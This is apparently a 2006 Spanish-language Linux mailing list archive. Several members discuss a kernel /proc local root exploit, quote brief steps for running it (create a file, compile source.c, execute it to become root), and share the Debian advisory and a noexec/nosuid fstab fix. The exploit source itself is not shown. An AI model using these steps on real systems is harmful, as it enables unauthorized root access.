[EMAIL PROTECTED] Felipe Tornvall wrote: hola lista arreglar fstab proc/proc procdefaults0 0 agregarlo a la primera linea si ya esta... no hay de q preocuparse prueba: crear archivo de 100 mg enb la home del user yes xxx luego compilar gcc -o archivo source.c ejecutar ./archivo xxx y listo !! estas como root Por acá OpenSuSe 10.1 kernel 2.6.16.13-4 también funciona el exploit :S -- Carlos Massoglia L. [EMAIL PROTECTED] [EMAIL PROTECTED] Ing. Informática U.T.F.S.M Valparaíso - Chile From [EMAIL PROTECTED] Wed Jul 19 23:54:26 2006 From: [EMAIL PROTECTED] (Horst von Brand) Date: Wed Jul 19 23:50:00 2006 Subject: Dispositivos biometricos In-Reply-To: Your message of Wed, 19 Jul 2006 09:08:48 -0400. [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Carlos A. Sepulveda M. [EMAIL PROTECTED] wrote: Felipe Tornvall wrote: yo estuve viendo unos sitios en usa que venden articulos con tec bio, que dispositivo buscas? podrias ser mas especifico ? ocular.. digital con bd... digital, con que mande la imagen me basta. Cuidado, lo de biometria tiene el serio problema que revocar una password es como bien dificil... Hay que tener precauciones para que no se puedan filtrar los datos del caso. -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de Informatica Fono: +56 32 654431 Universidad Tecnica Federico Santa Maria +56 32 654239 Casilla 110-V, Valparaiso, ChileFax: +56 32 797513 From [EMAIL PROTECTED] Wed Jul 19 23:56:39 2006 From: [EMAIL PROTECTED] (Hugo Figueroa R.) Date: Thu Jul 20 00:52:12 2006 Subject: aviso de seguridad - importante ver EXPLOIT adjunto In-Reply-To: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] esconder un problema es lo peor que se puede hacer, al ser publico las soluciones llegan mas rapido. Slds. --- Juan Martínez [EMAIL PROTECTED] escribió: Felipe Tornvall escribió: hola lista arreglar fstab proc/proc procdefaults 0 0 agregarlo a la primera linea si ya esta... no hay de q preocuparse prueba: crear archivo de 100 mg enb la home del user yes xxx luego compilar gcc -o archivo source.c ejecutar ./archivo xxx y listo !! estas como root http://www.debian.org/security/2006/dsa- Esto es exclusivamente para la rama del kernel 2.6.8. El lunes, al hacer diariamente apt-get update apt-get dist-upgrade, me di cuenta que se descargo kernel-image-2.6.8. Luego mire en los avisos de seguridad de debian de que se trataba... De todas maneras la recomendacion es cambiar en la linea de /etc/fstab de proc, defaults por noexec nosuid. Es buena idea mandar el source del exploit por aqui? Lo digo para no alentar a algun lammer que este entre nosotros... -- Juan Martinez G. Departamento de Informatica Universidad Miguel de Cervantes __ Correo Yahoo! Espacio para todos tus mensajes, antivirus y antispam ¡gratis! Regístrate ya - http://correo.espanol.yahoo.com/ From [EMAIL PROTECTED] Wed Jul 19 22:28:14 2006 From: [EMAIL PROTECTED] (Enrique Herrera Noya) Date: Thu Jul 20 01:10:08 2006 Subject: =?iso-8859-1?q?detalles_con_kde=2C_terminando_una_remasterizacio?=